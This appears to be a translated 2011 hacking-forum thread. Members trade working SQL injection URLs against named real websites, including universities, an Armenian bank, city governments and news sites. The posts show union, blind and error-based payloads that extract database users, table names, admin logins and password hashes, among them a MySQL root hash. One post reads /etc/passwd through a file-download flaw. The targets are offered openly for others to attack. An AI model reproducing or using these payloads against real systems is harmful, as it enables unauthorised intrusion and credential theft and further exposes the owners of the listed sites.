Code:
http://www.netporn.nl/uprofile.php?UID=70796+and+5=substring((SELECT+ver sion()),1,1)
surfbirds.com PR-5
Code:
http://surfbirds.com/video2/uprofile.php?UID=1045+UnIon+selECt+1,2,concat_ws(0 x3a,version(),user(),database()),4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31+--+
Code:
5.0.83-rs-log:surfbirds_vshare@localhost:surfbirds_videoshar e
OxoTnik said:
when you dig further, the site rejects my requests
But there is a phpBB forum there, so you can simply pull it out by guessing, like
Code:
http://www.ma3da.ru/news.php?news_id=-862+union+select+1,2,concat_ws%280x3a,user_id,user _password, username%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16 +from+phpbb_users--
Sorry for the slight off-topic, BUT...
Dear sir, on what assumptions do you say that the table quoted above exists there, if the hoster cuts off all your requests? A shot in the dark??
In the case where the hoster blocks requests, nothing prevents us from using the blind injection method and working with the data obtained.
There is no phpbb_users table there, but there is forum_users
I'll say even more - the forum_users table has as many as 10690 records.
Judge for yourselves
PHP:
http://www.ma3da.ru/news.php?news_id=999999.9+or+ascii(substring((SELE CT+count(*)+FROM+ma3daru.forum_users),1,1))=49
http://www.ma3da.ru/news.php?news_id=999999.9+or+ascii(substring((SELE CT+count(*)+FROM+ma3daru.forum_users),2,1))=48
http://www.ma3da.ru/news.php?news_id=99999+or+ascii(substring((SELECT+ count(*)+FROM+ma3daru.forum_users),3,1))=54
http://www.ma3da.ru/news.php?news_id=99999+or+ascii(substring((SELECT+ count(*)+FROM+ma3daru.forum_users),4,1))=57
http://www.ma3da.ru/news.php?news_id=99999+or+ascii(substring((SELECT+ count(*)+FROM+ma3daru.forum_users),5,1))=48
aydin-ka
13.10.2011, 16:18
TIC 650 PR 5
Code:
http://zvezda.ru/news_read.php?id=-9999999/**/union/**/select/**/concat_ws%280x3a,user%28%29,database%28%29,version %28%29%29,2,3,4,5,6,7,8,9+--+
antares_user@localhost:antares_DB:5.0.92-community
Code:
http://zvezda.ru/news_read.php?id=-9999999/**/union/**/select/**/group_concat%28table_name%29,2,3,4,5,6,7,8,9/**/from/**/information_schema.tables+--+
http://tambov.er.ru/shownew.php?id=-969 union select 1,2,3,4,5
United Russia. Tambov.
aydin-ka
15.10.2011, 15:17
TIC 80 PR 6
Code:
http://sundaytimes.lk/financenews/articleXYZ100000010.php?id=-1+union+select+concat_ws%280x3a,user%28%29,databas e%28%29,version%28%29%29,2,3,4,5,6,7,8--+
suntimes_sunday@localhost:suntimes_suntimes:5.0.92-community
Code:
http://sundaytimes.lk/financenews/articleXYZ100000010.php?id=-1+union+select+group_concat%28table_name%29,2,3,4, 5,6,7,8+from+information_schema.tables--
TIC 10 PR 5
Code:
http://www.financierworldwide.com/gp.php?id=99999999+union+select+1,2,3,concat_ws%28 0x3a,user%28%29,database%28%29,version%28%29%29,5, 6,7--+
financierworld@localhost:financierworld:4.1.20-community-nt
Cennarios
15.10.2011, 17:32
Just a hosting provider
https://www.host.co.in/hostbill/shoppingcart.php?gid=-5%27+union+select+1,2,3,user%28%29,version%28%29,6 ,7,8,9,database%28%29,1,2,3,4,5,6,7,8,9,10,1,2,3,4 ,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8 ,9,10,1,2,3,4,5,6,7,8,9,10,61,62,63,64,65,66--+
http://piroclub.ru/product_full.php?id=-3068/**/union/**/select/**/1,2,concat%28login,0x3a,password%29,4,5/**/from/**/users--
padded by 4 characters (forum glitch)
aydin-ka
16.10.2011, 13:39
TIC 10 PR 3
Code:
http://www.allpartners.ru/shops.php?id=99999999+union+select+concat_ws%280x3 a,user%28%29,database%28%29,version%28%29%29,2,3,4 ,5,6,7--+
ronis@localhost:wwwpultlggru:5.1.25-rc-log
Code:
http://www.allpartners.ru/shops.php?id=99999999+union+select+group_concat%28 table_name%29,2,3,4,5,6,7+from+information_schema. tables--
TIC 10 PR 6
Code:
http://www.pierce.ctc.edu/pubs/thepen/print.php?id=99999999+union+select+concat_ws%280x3 a,user%28%29,database%28%29,version%28%29%29,2,3--+
newsletter@localhost:newsletter:5.1.36-community
Code:
http://www.pierce.ctc.edu/pubs/thepen/print.php?id=-99999999+union+select+group_concat%28table_name%29 ,2,3+from+information_schema.tables--
http://www.vedo.ru/guest/guest.php?id=-1/**/union/**/select/**/1,2,concat_ws%280x3a,id_user,name,pass%29,4,5,6,7, 8/**/from/**/userlist
4 characters
one more
http://www.ugatu.ac.ru/Aviator/read_article.php?id=-598/**/union/**/select/**/1,2,concat_ws%280x3a,gb_number,gb_email,gb_mess_ni ck,gb_user_pass%29,4,5,6/**/from/**/gbook%20limit%201,1
http://lux-time.ru/vote.php?id=568-999.9+union+select+1,2,3,email,password,6,7,8,9,10 +from+users+limit+5,1--
5.1.49-rel11.3-log
vibirai@localhost
DB: vibirai_lux
Pick whatever interests you
Code:
http://www.handspc.ru/soft/soft.php?id=183/**/union/**/select/**/1,version%28%29,3,4,5,6,7%20,8,9,10,11,12,13,14,ta ble_name,16,17,18,19,20,21,22,23,24,25,26,27/**/from/**/information_schema.tables/**/--/**/
USERS
Code:
http://www.handspc.ru/soft/soft.php?id=183/**/union/**/select/**/1,version%28%29,3,user%28%29,5,6,7,8,9,10,11,12,13 ,14,concat_ws%280x3a,id,login,password%29,16,17,18 ,19,20,21,22,23,24,25,26,27/**/from/**/auth_tld/**/--/**/
Here's one more, only this one takes some thinking, I can't be bothered
Code:
http://job.saleone.ru/findrezum.php?a=2&id_rezum=705+order+by+18
And one more, everything as it should be.
Code:
http://efamily.ru/index.phtml?aid=-733+union+select+1,user%28%29,version%28%29,4,conc at_ws%280x3a,ID,user_login,user_pass,user_email%29 ,6,7,8,9,9+from+wp_users+--+&id=101&page=40003
and another
Code:
http://www.europa.fm/ru/index.html?c=about&id=-1+union+select+1,2,3,4,table_name,6,7,8+from+infor mation_schema.tables+limit%200,1--
(A night without shells... shameful...)
OxoTnik, IMHO you shouldn't be working on RU =/
But that's your business...
So, Geodata = Google Maps, American style
PHP:
http://geodata.us/uk_maps/map.php?id=999999'+union+select+null,null,user(),n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null+and+'a'='a
Code:
Current User: relgr_geodata@localhost
Sql Version: 5.0.77
Current DB: relgr_geodata
Data Bases: information_schema
relgr_geodata
OxoTnik said:
Here's one more, only this one takes some thinking,
I can't be bothered
Code:
http://job.saleone.ru/findrezum.php?a=2&id_rezum=705+order+by+18
Lazy =)
Code:
Current User: mt_jobpages@localhost
Sql Version: 5.0.90-log
Current DB: mt_jobpages
Blind SQL here.
somehow lots of admin panels and not a single shell... damn, how come
http://historicalcenter.ru/news.php?idt=-12+union+select+concat_ws%280x3a,id_users,login,Em ail,passwd%29,2+from+users--
The only interesting thing was the domain zone.
.GR
http://www.gagarin205.gr/date.php?date=501+and+1=2+union+select+1,user(),ve rsion(),4,5+--+
http://www.aiesep.ulg.ac.be/pages/poster_prize.php?id_event=32+uniOn/*pp*/select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user (),version()),13,14,15--
aiesep@localhost:5.0.77-log
http://www.crifa.ulg.ac.be/archives/edutech/actres/view_record.php?tb=sp&id=12+and/*ppp*/1=2+union/*ppp*/select+1318982400
http://www.gluon.ru/news/?id=-375+union+select+1,2,3,4,concat%28login,0x3a,pwd%2 9,6,7,8,9+from+gluon_users--
I'm aiming to become admin on all Russian sites, or at least on half of them
AHTNkiller
20.10.2011, 08:11
http://www.reeltoo.ru/re/live/?show=-22861+union+all+select+1,2,3,4,5,6,7,8,group_conca t%28login,0x3a,pass%29,10,database%28%29,user%28%2 9,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37%20from%20sys_users--
no login,no pass
Leform.ru CY275 PR4
Code:
http://www.leform.ru/news.php?date=2011-4'+union+select+1,2,concat('User:',user(),'%3Cbr%2 0/%3EVersion:',version(),'%3Cbr%20/%3EDatabase:',database()),4,NULL,6,7,8,9+/*+
robert_work
21.10.2011, 21:29
PR-5 ТИЦ-350
Code:
http://www.pilot-film.com/index.php?id=999999.9+union+all+select+0x6E6F,vers ion(),0x6E6F,0x6E6F,0x6E6F,0x6E6F,0x6E6F,0x6E6F,0x 6E6F,0x6E6F,0x6E6F--
http://www.pilot-film.com/update/index.php - admin panel
http://www.pilot-film.com/myadmin - admin panel
aydin-ka
21.10.2011, 21:54
Armenian BANK
TIC 90 PR 5
Code:
http://www.acba.am/index.php?page=-1%27+union+select+1,2,3,4,5,6,concat_ws%280x3a,use r%28%29,database%28%29,version%28%29%29,8,9,10+--+
tigran@localhost:acbadb:5.0.92-log
Mega cool site
http://search.adslclub.ru/?show_dir=1&id=0&id_res=-6/**/union/**/select/**/1,2,3,version(),5,6,7,8,9--
http://wipz.uwp.edu/news.php?id=-1%20union%20select%201,table_name,3,4,5,6,7+from+i nformation_schema.tables+where+table_schema!=0x696 e666f726d6174696f6e5f736368656d61
A Moscow cinema.
http://www.5zvezd.ru/news/2011/10/20/930+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,1 2,concat_ws%280x3a,version%28%29,database%28%29,us er%28%29%29,14,15,16,17,18,19,20,21,22,23,24,25+--+/
Sloommmik
23.10.2011, 14:02
Target: http://www.hbswany.org/images.html?view_album=20
Host IP: 207.171.1.101
Web Server: Apache
DB Server: MySQL >=5
Resp. Time(avg): 769 ms
Current User: webuser1@localhost
Sql Version: 5.0.82sp1
Current DB: hbswany_org
System User: webuser1@localhost
Host Name: jaws02.omnimagnet.com
Installation dir: /usr/
DB User: 'webuser1'@'%'
Code:
http://secure.ws-montessori.com/produkt/produkt.php?show=-6/**/union/**/select/**/1,2,3,version(),5,6,7,8,9,10--
Whoever has a wordlist of German table names can try scanning. Otherwise... mysql 4
DB: montessorien
Code:
http://www.sleepmonsters.us/news.php?article_id=-4315+union+select+1,2,3,4,concat_ws%280x3a,version %28%29,database%28%29,user%28%29%29,6,7,8,9,10,11, 12,13--+
5.0.77-log:503342_SleepMonsters:503342_SM_user@172.17.35. 64
Code:
http://www.iceandwine.com/product-list.php?cid=-13+union+select+version%28%29--
aydin-ka
24.10.2011, 21:29
Code:
http://www.morehate.com/ru/press.php?id=49+union+select+1,2,concat_ws%280x3a, user%28%29,database%28%29,version%28%29%29--
morehat1_karalez@localhost:morehat1_morehateru:5.0 .92-log
Code:
http://www.morehate.com/ru/press.php?id=49+union+select+1,2,table_name+from+I NFORMATION_SCHEMA.TABLES--
Code:
http://kuzshop.ru/?p=28&c=-72+union+select+1,concat_ws%280x3a,version%28%29,d atabase%28%29,user%28%29%29,3,4,5--+
5.1.58-log:wwwkuzshopru_evrik:kuzshop@fe107.hc.ru
Code:
http://www.towncrier.us/crierdetail.php?smenu=1&twindow=&sdetail=17860&mad=&wpage=1&skeyword=&sidate=&recID=-1237+union+select+1,2,3,4,concat_ws%280x3a,version %28%29,database%28%29,user%28%29%29,6,7--+
4.0.18-standard:town_crier:milford_crier@localhost
Code:
http://www.sunnet.us/view_news.php?nid=70+union+select+1,2,3,concat_ws% 280x3a,version%28%29,database%28%29,user%28%29%29, 5--+
5.0.45-community-nt:sn_db:sn_usr@localhost
Code:
http://www.ci.mesquite.tx.us/pressrelease/Press_release.php?IDkey=-187+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9--+
4.0.24-nt:news:news@www.cityofmesquite.com
Code:
http://womenofthestorm.us/news_subdet.php?wots_subcontent_ID=-133+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5--+
5.1.52-log:wos:wos_user@localhost
why was the edu removed?
http://www.lakeerie.edu/news.php?id=0%20union%20select%201,2,version(),4,5 ,6,7,8
http://www.spcc.edu/news.php?id=0%20union%20select%201,2,version(),4,5 ,6,7,8,9,10
http://archive.parsons.edu/view.php?pid=68%20and%20database()='dt_archive'
http://www.mcs.sdsmt.edu/view.php?p=0%20union%20select%201,version(),3,4,5, 6
(a shell can be uploaded to the last one without any problems)
aydin-ka
25.10.2011, 21:19
TIC 400 PR 3
Code:
http://www.pascal.ru/index.php?id=9999999+union+select+concat_ws%280x3a ,user%28%29,database%28%29,version%28%29%29+--+
pascal.ru@localhost: pascal:5.0.24a-log
Code:
http://www.pascal.ru/index.php?id=9999999+union+select+table_name+from+ information_schema.tables--
Maly.ru TIC 1000 PR6
Code:
http://maly.ru/people.php?name=ZharovM%27+order+by+10++--+
lololo, "hack attempt detected", the author apparently isn't aware of group by.
Code:
http://maly.ru/people.php?name=ZharovM%27+group+by+11++--+
There is a filter on UniOn SelEct though; I didn't bother, the error is displayed, and that's enough.
Code:
http://maly.ru/people.php?name=1%27+and%28select+1+from%28select+ count%28*%29,concat%28%28select+concat_ws%280x3a,u ser%28%29,database%28%29,version%28%29%29+from+inf ormation_schema.tables+limit+0,1%29,floor%28rand%2 80%29*2%29%29x+from+information_schema.tables+grou p+by+x%29a%29+--+
stepashka_
27.10.2011, 14:53
http://www.placeanad.ru/index.php?id_typ=288+union+select+1,2,3,4,5,6,CONC AT_WS(user(),version(),DATABASE()),8,9,0,1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5,6,7,8+--+
4, sigh
http://railroad.union.rpi.edu/article.php?article=0%20union%20select%201,2,3,ver sion()
FORD service center
http://www.ford-nnov.ru/index.php?page=42&idm=-3+and+1=2+union+select+1,2,3,concat_ws(0x3a,@@vers ion,user(),database()),5,6,7,8+--
further actions are blocked by sweb
http://www.ford-nnov.ru/index.php?page=42&idm=-3+and+1=2+union+select+1,2,3,4,5,6,7,8+from+admin--
AC//DC said:
http://www.ford-nnov.ru/index.php?page=42&idm=-3+and+1=2+union+select+1,2,3,concat_ws(0x3a,@@vers ion,user(),database()),5,6,7,8+--
further actions are blocked by sweb
http://www.ford-nnov.ru/index.php?page=42&idm=-3+and+1=2+union+select+1,2,3,4,5,6,7,8+from+admin--
You should have worked it as a blind injection. I already wrote that spaceweb doesn't block working SQL injections through blind injection.
In your case:
Code:
http://www.ford-nnov.ru/index.php?page=42&idm=-3+or+ascii(substring((select+anket_forms.email+fro m+fordnnov.anket_forms+order+by+id+limit+0,1),1,1) )=97
There are 207 records of the form email:hash there
Only I didn't find any login
stepashka_
29.10.2011, 14:27
http://www.vladdom.ru/index.php?mod=page_show&id_pag=-49+union+select+1,2,3,4,concat_ws(0x3a,version(),u ser(),DATABASE()),6,7,8,9,0,1,2++--+
stepashka_ said:
http://www.vladdom.ru/index.php?mod=page_show&id_pag=-49+union+select+1,2,3,4,concat_ws(0x3a,version(),u ser(),DATABASE()),6,7,8,9,0,1,2++--+
Noticed the error, filesize() /7
Code:
http://www.vladdom.ru/index.php?mod=page_show&id_pag=-49+union+select+1,2,3,4,concat_ws%280x3a,version%2 8%29,user%28%29,DATABASE%28%29%29,6,0x2e2e2f2e2e2f 436f6e6e656374696f6e732f76646f6d2e706870,8,9,0,1,2 ++--+
Click on download file ../../Connections/vdom.php and get the file.
/etc/passwd:
Code:
http://www.vladdom.ru/index.php?mod=page_show&id_pag=-49+union+select+1,2,3,4,concat_ws%280x3a,version%2 8%29,user%28%29,DATABASE%28%29%29,6,0x2e2e2f2e2e2f 2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764 ,8,9,0,1,2++--+
Code:
http://www.bcspeakers.org/product.php?id=0000000347+UNION+SELECT+1,2,3,4,5,6 ,CONCAT_WS(USER(),VERSION(),DATABASE()),8,9,10,11, 12,13,14,15+--
5.0.77www-bcspeakersro@localhostwww-bcspeakerstest
user:becspeak2803
Code:
http://www.drawminos.com/index.html?id=-218283+union+select+1,2,concat_ws(version(),databa se(),user()),4,5,6+--+
version: 5.0.77
database: drawminos
user: drawn
TIC: 10 / PR: 4
Code:
http://luellagloverwilson.co.uk/page.php?p=char(49,57,39)+AND+1=2+UNION+SELECT+1,2 ,CONCAT_WS(USER(),VERSION(),DATABASE())+--
5.0.92-communityxian_lgw@localhostxian_lgw
..the inject turned out to be a very sad one..
2nikp - Slipped up a bit, CONCAT_WS(['-',USER(),VERSION(),DATABASE())
aydin-ka
30.10.2011, 21:28
TIC 10 PR 6
Code:
http://www.dgc.ca/faq2.php?language=0&id=173&faqid=577+union+select+concat_ws%280x3a,user%28%29 ,database%28%29,version%28%29%29--
NDD@localhost:NDD:5.0.22-Debian_0ubuntu6.06.15-log
P.S.: first time I've seen this
Query + code on the page
Code:
http://www.canaramblers.com/index.php?page=13+union+select+1,concat_ws%280x3a, version%28%29,database%28%29,user%28%29%29,3
5.0.91-log:db315217298:dbo315217298@cgi1402.int.bizland.n et
1:1:YES:admin:c50672216e6be50f327c7df719784fe3:
Simpliest said:
I can't figure out what kind of SQLi this is, maybe someone can help make it work?
http://il2.aviasibir.ru/mow/?page=pilot&pilotname==WA=Snurf'+and+1='1
Code:
http://il2.aviasibir.ru/mow/?page=pilot&pilotname==WA=Snurf%27+and+1=3+union+select+1,conc at_ws%280x3a,database%28%29,user%28%29,version%28% 29%29++/*
Code:
http://il2.aviasibir.ru/mow/?page=pilot&pilotname==WA=Snurf%27+and+1=3+union+select+1,grou p_concat%28table_name%29+from+information_schema.t ables+where+table_schema!=%27information_schema%27 ++/*
www.abw.by is an analogue of our auto.ru
php5/MySQL/nginx
50K/day
Basically the index file takes a gazillion parameters, and the 100500th of them is leaky...
The index file connects to just one single database, "auto" (283 tables). A forum (phpBB) sits next to it, but it probably has its own database with its own user, since its tables are not in the current database...
But there is OpenX. Most likely version 2.4 (that is, OpenAds, judging by the tables):
Code:
openads.ab-daily.by/admin/index.php
abd39:738762a9001a63ee8b820f775325d1e7
And there's also a massive headache with the output here! The output follows right after the string 0x6775695F6865616465725F6163746976655F7461625F636F 6C6F72+--+&type_engine=&year1=1960&year2=2010&cost_val1=&cost_val2=&u_city=7&period=&sort=&x=41&y=6
PHP:
view-source:http://www.abw.by/index.php?set_small_form_1=1&act=public_search&do=search&index=1&adv_type=1&model=&marka='+UNION+SELECT+count(*),2,3,4,5+from+users+--+&type_engine=&year1=1960&year2=2010&cost_val1=&cost_val2=&u_city=7&period=&sort=&x=41&y=6
Anyway, have fun
http://www.bioen.utah.EDU/faculty/RDR/index.php?cat_id=-1+union+select+1,version()--
VERSION =5.5.11=
University of Utah
PR6
BLurpi^_^ said:
http://www.fckhimki.ru/modules/news/index.php?current_id=1
http://www.inharmony.ru/news/news.php?id=31'
Just decided to bring the links into proper shape
Code:
http://www.fckhimki.ru/modules/news/index.php?current_id=1+and+1=2+union+select+1,2,ve rsion(),4,5,6,7,8,9,10,11,12,13
Sql Version: 5.0.90-log
Current User: fckhimki_new1@217.112.35.70
Current DB: fckhimki_new1
TIC = 750
PR = 0
No users =(
Code:
http://www.inharmony.ru/news/news.php?id=31+and+1=2+union+select+1,2,3,4,5,vers ion(),7
Sql Version: 5.0.70-log
Current User: ba3177@localhost
Current DB: ba3177_db
TIC = 130
PR = 0
Code:
http://www.pdasmart.ru/index.php?action=submenu&mtid=-13+union+select+concat_ws%280x3a,version%28%29,dat abase%28%29,user%28%29%29--+
5.1.56:a1_pdasmart:a1_pdasmart@localhost
admins--id,login,password,supervisor
1:white:555999:1,
tabletkO
03.11.2011, 20:34
First post =)
TIC 275, PR 5
It's all easy...
PHP:
http://migavia.ru/corporation/?tid=999999.9+union+all+select+1,version(),user(), 4,database()--
TIC 30, PR 4
A bit harder...
PHP:
http://www.coyc.ru/types.php?tid=1+and(select+1+from(select+count(*), concat((select+(select+concat(user()))+from+%60inf ormation_schema%60.tables+limit+0,1),floor(rand(0) *2))x+from+%60information_schema%60.tables+group+b y+x)tabletkO)+and+1=1
The source apparently has a URL validity check, so I had to do a CONCAT with http://google.com/
Code:
http://www.aquarette.com/adtausch/count.php?click=yes&yourid=8&id=3+and+1=5+union+select+CONCAT(0x687474703a2f2f6 76f6f676c652e636f6d2f,user())+--+
We get redirected to
Code:
http://www.google.com/dbo88894615@212.227.127.162
Code:
http://www.aquarette.com/adtausch/count.php?click=yes&yourid=8&id=3+and+1=5+union+select+CONCAT(0x687474703a2f2f6 76f6f676c652e636f6d2f,concat_ws(0x3b,user(),databa se(),version()))+--+
Code:
http://www.google.com/dbo88894615@212.227.127.162;db88894615;4.0.27-max-log
PR 8 TIC 2000
http://www.washington.EDU/research/ls.php?id=-18+union+select+1,2,3,4,5,6,7,8,version(),10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
UNIVERSITY
(in terms of prestige, something like our MSU)
VERSION DB =5.0.45=
there is a database named wordpress there
pulled from it
login: admin
hash: $P$BCL7jmzj0nFwHYR0Z/tSk5ZtMMuS/2/
+there are also about 5-6 Drupal databases there.
student accounts etc..
got to the mysql database, user table
host: washington.edu
login: root
hash: *5131AA9105DF140BDBB40A112188C23B35C639F5
http://freeadvertisingforum.com/adserver/image.php?size_id=0%20union%20select%201,2,3,versi on%28%29,5,6,7,8,9,10,11
PR - 4
aydin-ka
06.11.2011, 01:07
Traffic 3-4K
Code:
http://www.auto-creditline.ru/sell_cat.php?cid=-1%27+union+select+1,2,3,4,concat_ws%280x3a,user%28 %29,database%28%29,version%28%29%29,6,7,8,9+--+
autocre3_site@localhost:autocre3_credit:5.0.92-log
Tables
Contents of cr_users
PHP:
login
pwd
master
userid
session
P.S.: You'll get access to the admin panel, but you'll hit a dead end there
Haven't been here in a long time
Code:
http://www.dog-perm.ru/modules.php?name=pitomnik&pag=&num_page=1®ion_id=48&poroda_num=0&order=union+select+1,concat_ws%28user%28%29,versio n%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12,1 3,14,15%20--
User:dog-permru@78.108.81.161
Version:4.1.22
Database:dogpermru
TIC 140
Osstudio
07.11.2011, 01:39
http://www.tiranatimes.com/news.php?cat=3&id=33+and+1=0+union+select+1,unhex%28hex%28concat_ ws%280x3a3a3a,version%28%29,database%28%29,user%28 %29%29%29%29,3,4,5,6,7,8,9,10,11,12--
4.1.14:::tiranatimes:::ttimes@localhost
Moriarty said:
www.vmdaily.ru
TYC -
4900
Code:
http://www.vm/d/aily.ru/showarticle.php?id=184843' AND 464=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),CHAR(32)) FROM information_schema.TABLES WHERE table_schema=CHAR(111,108,100,115,105,116,101)),1, 1)) != 48),SLEEP(5),464) AND 'isil'='isil
http://www.vm/da/ily.ru/showarticle.php?id=184843' AND 464=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),CHAR(32)) FROM information_schema.TABLES WHERE table_schema=CHAR(111,108,100,115,105,116,101)),2, 1)) > 48),SLEEP(5),464) AND 'isil'='isil
http://www.vm/da/ily.ru/showarticle.php?id=184843' AND 464=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),CHAR(32)) FROM information_schema.TABLES WHERE table_schema=CHAR(111,108,100,115,105,116,101)),2, 1)) > 1),SLEEP(5),464) AND 'isil'='isil
Why such complications? It's not a blind SQLi there.
Code:
http://www.vmdaily.ru/showarticle.php?id=184843%27+and+1=3+union+select+ 1,table_name,3+FROM+information_schema.tables+--+
tabletkO
07.11.2011, 09:51
EDU =/
Subdomain of Indiana university
TIC 10, PR 6
Code:
http://www.math.indiana.edu/seminars/seminar.phtml?id=-1+union+all+select+database(),2,3,4,5,6,7--
P.S. SQLi were posted earlier, but on a different subdomain...
Result: a redirect.
ScriptDungeon.com
Code:
http://www.scriptdungeon.com/jump.php?ScriptID=134+and+1=21+union+select+1,2,3, concat_ws(0x3b,version(),database(),user()),5,6,7, 8,9,10,11,12+--+
Result:
Code:
Redirect to:
http://www.scriptdungeon.com/5.1.42;scriptdungeon;dboscriptupdate@localhost
Code:
http://www.alienship.ru/index.php?type=ship&id=20
alienshi@89.111.176.235
5.1.58-log
wwwalienshipru
crap
aydin-ka
07.11.2011, 17:50
Alexa Rank 293,690 PR 4
Code:
http://www.dianzinet.com/buy/wnhtml.php ?sec=buycontact &id=99999999999+UNION+SELECT+1,2,3,concat_ws(0x3a,u ser(),database(),version()),5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
icadm@localhost:db_chinaicnet_com:5.0.77
Code:
http://www.dianzinet.com/buy/wnhtml.php ?sec=buycontact &id=99999999999+UNION+SELECT+1,2,3,table_name,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29+from+information_schema.tables
Code:
http://www.dianzinet.com/buy/wnhtml.php ?sec=buycontact &id=99999999999+UNION+SELECT+1,2,3,column_name,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29+from+information_schema.columns
HackZona.ru
CY200 PR2
concat_ws(0x3b,version(),database(),user())
POST /hz.php?name=Search HTTP/1.1
Request body:
Code:
query=s&topic=26' AND 1=2 UNION SELECT 1,2,3,4,5,6,CONCAT_WS(0x3b,version(),database(),us er()),8,9,10,11,12,13 # &category=0&author=123&days=7&type=stories
Code:
5.1.42;hz4647;hz4647@localhost
The query there is very interesting, by the way:
Code:
select s.sid, s.aid, s.informant, s.title, s.time, s.hometext, s.bodytext, s.counter, a.url, s.comments, s.topic, s.score, s.ratings from voov_stories s, voov_authors a where s.aid=a.aid AND (s.title LIKE '%s%' OR s.hometext LIKE '%s%' OR s.bodytext LIKE '%s%' OR s.notes LIKE '%s%') AND s.informant='123' AND s.topic='26[SQL INJ]' AND TO_DAYS(NOW()) - TO_DAYS(time)
http://www.clas.ru/people.php?id=-5952+union+select+1,2,3,concat_ws%280x3a,id,email, pass,nam%29,5,6,7,8+from+t_users--
Limit and off you go
OxoTnik said:
Limit and off you go
already posted =/
/printthread.php?t=21336&page=6508&pp=1
Code:
http://www.enridan.com/place.php?id=8+union+select+1,concat_ws%280x3a,ver sion%28%29,database%28%29,user%28%29%29,3,4,5,6,7, 8--+
4.0.27-log:enridandb:enridan@localhost
aydin-ka
09.11.2011, 15:50
The official site of the Armenian Philharmonic Orchestra
TIC 40 PR 5
Code:
http://www.apo.am/index.php?content=1&id=9999999+union+select+1,2,3,4,5,6,7,8,concat_ws% 280x3a,user%28%29,database%28%29,version%28%29%29, 10--
apo_apo@localhost:apo_apo:5.0.92-community-log
Code:
http://www.apo.am/index.php?content=1&id=9999999+union+select+1,2,3,4,5,6,7,8,group_conc at%28table_name%29,10+from+INFORMATION_SCHEMA.COLU MNS--
PHP:
admin
apo_news
artists
attachments
concerts
gallery
guest
Interesting table "admin"
Code:
http://www.apo.am/index.php?content=1&id=9999999+union+select+1,2,3,4,5,6,7,8,concat_ws% 28id,0x3a,email%29,10+FROM+admin--
http://www.apo.am/phpinfo.php - No comment on this one
http://bgnevesta.com/hotornot/viewcomments.php?phid=0%20union%20select%201,usern ame,3,password,5,6%20from%20admin--#
PR 3
maxim2142
10.11.2011, 17:24
Novosibirsk State Technical University
Code:
http://inform.nstu.ru/index.php?type=mir&stat=617
nginx/0.7.62
PHP/5.2.17 ZendServer/5.0
MySQL >=5
inform@localhost
5.0.77
inform@localhost
hosting.nstu.ru
Data Bases: information_schema
inform
test
http://www.gamer365.hu/profile.php?user_id=128+and+1=0+union+select+1,tab le_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35, 36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,42 ,53,54,55+from+information_schema.tables%20limit%2 043,1--
PR 5 TIC 100
http://www.bgiki.ru/news/more.php?id=-168+union+select+1,2,3,version()--
version =5.1.41-log=
For the Russian and Estonian pilot. Part 1
Site: joblist.tj
Code:
http://www.joblist.tj/showvacancy.php?id=-1478+union+Select+1,concat_ws(version(),database() ,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23+--+
version: 5.0.91-community-log
database: develop_joblisttj
user: develop_ns@localhost
+ Vulnerable parameter:
Code:
/index.php?catid=11'SQL-Injection'
database found:
Code:
develop_za (the most interesting one)
Site: baza.kob.tj
Code:
http://baza.kob.tj/?a=orgtype&id=-45+union+select+concat_ws%280x3a,version%28%29,dat abase%28%29,user%28%29%29,2,3+--+
version: 5.0.92-community
database: kobtj_db
user: kobtj_dbuser@localhost
Site: person.tj
Code:
http://www.person.tj/index.php?id=-938+union+select+1,concat_ws%280x3a,version%28%29, database%28%29,user%28%29%29+--+
version: 4.1.25
database: person
user: user@localhost
Site: dictionary.tj
Code:
http://dictionary.tj/finance/index.php?id=-1012+union+select+1,concat_ws(0x3a,version(),datab ase(),user())+--+
version: 4.1.25
database: base
user: user@localhost
http://www.animalshaveproblemstoo.com/view.php?id=-001+union+select+1,2,3,4,5,version(),7,8,9,10
4.0.30-max-log
A bit of Americana =/
Site:adenamontessori.us
PR=2
Inject
Code:
_ttp://adenamontessori.us/product.php?cid=4+and+substring((@@version),1,1)=4
Version:4.1.24-max-log
Database:josephbiz
User:josephbiz@68.178.254.81
-----------------------------------------------------
-----------------------------------------------------
Site:www.ci.bartlesville.ok.us
PR=5
Inject
Code:
_ttp://www.ci.bartlesville.ok.us/category.php?cat=1041+and+substring((@@version),1, 1)=4
Version:4.0.30-max-log
Database:pendergraphics
User:pendergraphics@68.178.254.114
-----------------------------------------------------
-----------------------------------------------------
Site:www.simcom.us
PR=2
Inject
Code:
_ttp://www.simcom.us/product_detail.php?cid=1&pid=14+and+1=2+union+select+1,2,version(),database (),user(),6,7,8,9,10,11,12,13,14,15
Version:4.0.27-max-log
Database:db295004332
User:dbo295004332@74.208.122.71
Code:
